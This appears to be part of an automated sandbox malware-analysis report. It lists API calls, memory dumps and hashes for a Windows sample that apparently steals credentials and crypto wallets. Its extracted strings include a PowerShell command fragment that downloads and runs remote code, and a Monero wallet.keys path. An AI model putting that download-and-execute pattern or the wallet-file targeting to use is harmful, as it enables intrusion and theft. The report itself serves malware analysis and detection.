                                   • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 3031569214-898575020
                                  • Opcode ID: 4f658b2e5817f664581763cca0039d721d7ab0eef66b4c73718dfeab0d0af059
                                  • Instruction ID: 20913c59f7e08ab2a977b2c3f3e4a37cd1b2b11f24d74c2c82bffebc4bd6eca0
                                  • Opcode Fuzzy Hash: 4f658b2e5817f664581763cca0039d721d7ab0eef66b4c73718dfeab0d0af059
                                  • Instruction Fuzzy Hash: C041DD71D602089AEB1CFFA0CC92BEDB774EF14304F504119F416A6192DF746A6ACF95
                                  APIs
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00239F41
                                    • Part of subcall function 0024A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0024A7E6
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                   • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$AllocLocal
                                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                  • API String ID: 4171519190-1096346117
                                  • Opcode ID: 6d7d05d21ac332c1a2d836b934525781190580a9740cd60d9f34826a664abb9d
                                  • Instruction ID: 0f4ef102bd2a34cb0d9212671b9f39f9f3d0b52f141ed70d4a0cad4b83b2ccc8
                                  • Opcode Fuzzy Hash: 6d7d05d21ac332c1a2d836b934525781190580a9740cd60d9f34826a664abb9d
                                  • Instruction Fuzzy Hash: 3F615E71A60208EBDB28EFA4CC96FED7775AF41304F408128F90A5F191EB746A25CF52
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,0104E4A8,00000000,00020119,?), ref: 002440F4
                                  • RegQueryValueExA.ADVAPI32(?,0104F230,00000000,00000000,00000000,000000FF), ref: 00244118
                                  • RegCloseKey.ADVAPI32(?), ref: 00244122
                                  • lstrcat.KERNEL32(?,00000000), ref: 00244147
                                  • lstrcat.KERNEL32(?,0104F020), ref: 0024415B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                   • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 690832082-0
                                  • Opcode ID: 52df2625e56a2c0b74eb5b5c1f3621387666ea833b305dd72e400263df5ec29b
                                  • Instruction ID: feeedc3d5d035c8bc15aa43d8b207de55641b6ad49bfe25e59805c9b7185ecbd
                                  • Opcode Fuzzy Hash: 52df2625e56a2c0b74eb5b5c1f3621387666ea833b305dd72e400263df5ec29b
                                  • Instruction Fuzzy Hash: A14147B6D101086BDB18FBA0DC56FFE737DAB88300F404558B61A96181EA755BE88FD2
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00247E37
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00247E3E
                                  • RegOpenKeyExA.ADVAPI32(80000002,0103B840,00000000,00020119,?), ref: 00247E5E
                                  • RegQueryValueExA.ADVAPI32(?,0104E588,00000000,00000000,000000FF,000000FF), ref: 00247E7F
                                  • RegCloseKey.ADVAPI32(?), ref: 00247E92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                   • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: fc1b41d49f0f7fe7e769e48a645ec5fa41a990fa4306ed4dc15d699ebd6f6391
                                  • Instruction ID: 1b4419bf87dee518c71215aab8ee49fd6bc06614fb05d06110914021d7d5e1ae
                                  • Opcode Fuzzy Hash: fc1b41d49f0f7fe7e769e48a645ec5fa41a990fa4306ed4dc15d699ebd6f6391
                                  • Instruction Fuzzy Hash: AD11A0B1A54205EBD704DF94DD49FBFBBBCFB44B01F104269FA19A7280D7B458148BA2
                                  APIs
                                  • StrStrA.SHLWAPI(0104F2A8,?,?,?,0024140C,?,0104F2A8,00000000), ref: 0024926C
                                  • lstrcpyn.KERNEL32(0047AB88,0104F2A8,0104F2A8,?,0024140C,?,0104F2A8), ref: 00249290
                                  • lstrlen.KERNEL32(?,?,0024140C,?,0104F2A8), ref: 002492A7
                                  • wsprintfA.USER32 ref: 002492C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                   • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpynlstrlenwsprintf
                                  • String ID: %s%s
                                  • API String ID: 1206339513-3252725368
                                  • Opcode ID: 36dd5b6f68b96a0a998a9d7c7ff68d49298a5b2e6ac7243f227c1a947a42588e
                                  • Instruction ID: 6d96c02d17cc6f7a3ee82037747af3b4c862f7141ce30d245affeb4254c6a705
                                  • Opcode Fuzzy Hash: 36dd5b6f68b96a0a998a9d7c7ff68d49298a5b2e6ac7243f227c1a947a42588e
                                  • Instruction Fuzzy Hash: B701CC75500108FFCB04DFECC988EAE7BB9EB84355F108558F90D9B204C675AAA0DBD6
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002312B4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002312BB
                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 002312D7
                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 002312F5
                                  • RegCloseKey.ADVAPI32(?), ref: 002312FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                   • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 103a763ddfb6a70080c7bcd5702404141c99a93302f95617c705e42ced4d4604
                                  • Instruction ID: 2877c593d62fcbb9451a03bb65a50c9d0f652df2b0fd4f8abb3aee071cbd8672
                                  • Opcode Fuzzy Hash: 103a763ddfb6a70080c7bcd5702404141c99a93302f95617c705e42ced4d4604
                                  • Instruction Fuzzy Hash: 430131B9A40208BBDB04DFE0DC49FAEB7B8EB88701F008169FA0997280D6709A558F55
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                   • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Type
                                  • String ID:
                                  • API String ID: 2109742289-3916222277
                                  • Opcode ID: f80cdf3f7bbdbe486bcdc50110023b3c338e7b9850c3ba01d6bf670ace63ee98
                                  • Instruction ID: 3db0e1a823ff537a6fb93b49b654b963ac7769c196de9cc34c6c2d2d139c45b9
                                  • Opcode Fuzzy Hash: f80cdf3f7bbdbe486bcdc50110023b3c338e7b9850c3ba01d6bf670ace63ee98
                                  • Instruction Fuzzy Hash: 0441097111175CAEDB2A8B28CC84FFBBBEC9F45704F2444E8E5CA86182D2719A54CF20
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00246663
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00246726
                                  • ExitProcess.KERNEL32 ref: 00246755
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                   • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                  • String ID: <
                                  • API String ID: 1148417306-4251816714
                                  • Opcode ID: 4d36c2559d9a91de125fd1433c0c727d8aff530b7f880f036ee9504c5a865ff9
                                  • Instruction ID: ddef8a18c0fb23bcd14f52ccfc5ebd9f0d3a81392f638e18f7ce1ac8a328da7b
                                  • Opcode Fuzzy Hash: 4d36c2559d9a91de125fd1433c0c727d8aff530b7f880f036ee9504c5a865ff9
                                  • Instruction Fuzzy Hash: 353141B1C11218ABDB18EB50DC92FDDB778AF44300F404199F30966191DF746B99CF5A
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00250E28,00000000,?), ref: 0024882F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00248836
                                  • wsprintfA.USER32 ref: 00248850
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: 1922c97624bfba6c85eef0f09f2a71b8c28293581a3071d08ca17ca2f43a8faa
                                  • Instruction ID: e880469a649067574545c97cfe6f3d232798c5fe89d6b955c79590eef0c8b4bf
                                  • Opcode Fuzzy Hash: 1922c97624bfba6c85eef0f09f2a71b8c28293581a3071d08ca17ca2f43a8faa
                                  • Instruction Fuzzy Hash: A32154B1E50208AFDB04DFD4DD45FAEBBB8FB48701F104159F609A7280C7799950CBA6
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0024951E,00000000), ref: 00248D5B
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00248D62
                                  • wsprintfW.USER32 ref: 00248D78
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesswsprintf
                                  • String ID: %hs
                                  • API String ID: 769748085-2783943728
                                  • Opcode ID: 4f66d0445d1078df5a3ca19292928dd7cc4bfc4a2d31f80c9a10e883a4421c69
                                  • Instruction ID: 147736b8ca77bd357ec8daef83477cd87b7aa6decb2f5249239b44060b3889f7
                                  • Opcode Fuzzy Hash: 4f66d0445d1078df5a3ca19292928dd7cc4bfc4a2d31f80c9a10e883a4421c69
                                  • Instruction Fuzzy Hash: 59E08670A40208BBC700DB94DC09E5D77BCEB44702F0400A4FD0D97240D9719E648B5A
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                    • Part of subcall function 00248B60: GetSystemTime.KERNEL32(00250E1A,0104EC50,002505AE,?,?,002313F9,?,0000001A,00250E1A,00000000,?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 00248B86
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0023A2E1
                                  • lstrlen.KERNEL32(00000000,00000000), ref: 0023A3FF
                                  • lstrlen.KERNEL32(00000000), ref: 0023A6BC
                                    • Part of subcall function 0024A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0024A7E6
                                  • DeleteFileA.KERNEL32(00000000), ref: 0023A743
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 190f0dcc8b90f01451829c9677645fa718940358eab7b6b874a885f99984c574
                                  • Instruction ID: 503b10f686c926f1d0ed2eecf01d9606a41c7fe8f1c6ef9590f7dfe3c3329838
                                  • Opcode Fuzzy Hash: 190f0dcc8b90f01451829c9677645fa718940358eab7b6b874a885f99984c574
                                  • Instruction Fuzzy Hash: BBE1DF728601189AEB18EBA4DC92EEE7338EF54304F508169F51776091EF306A69CF66
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                    • Part of subcall function 00248B60: GetSystemTime.KERNEL32(00250E1A,0104EC50,002505AE,?,?,002313F9,?,0000001A,00250E1A,00000000,?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 00248B86
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0023D481
                                  • lstrlen.KERNEL32(00000000), ref: 0023D698
                                  • lstrlen.KERNEL32(00000000), ref: 0023D6AC
                                  • DeleteFileA.KERNEL32(00000000), ref: 0023D72B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: c6a412fee9aafaecaaf0655fa78ee9854f00575e73355feeb8c8ba1de97d82ac
                                  • Instruction ID: 4d8d7a8a2a5c51ff83dcc76ef94a655c4a47341d5c089149918a122293d95301
                                  • Opcode Fuzzy Hash: c6a412fee9aafaecaaf0655fa78ee9854f00575e73355feeb8c8ba1de97d82ac
                                  • Instruction Fuzzy Hash: E39113728601089BEB0CFBA0DC92EEE7338EF54304F514568F507A6091EF346A69CF66
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                    • Part of subcall function 00248B60: GetSystemTime.KERNEL32(00250E1A,0104EC50,002505AE,?,?,002313F9,?,0000001A,00250E1A,00000000,?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 00248B86
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0023D801
                                  • lstrlen.KERNEL32(00000000), ref: 0023D99F
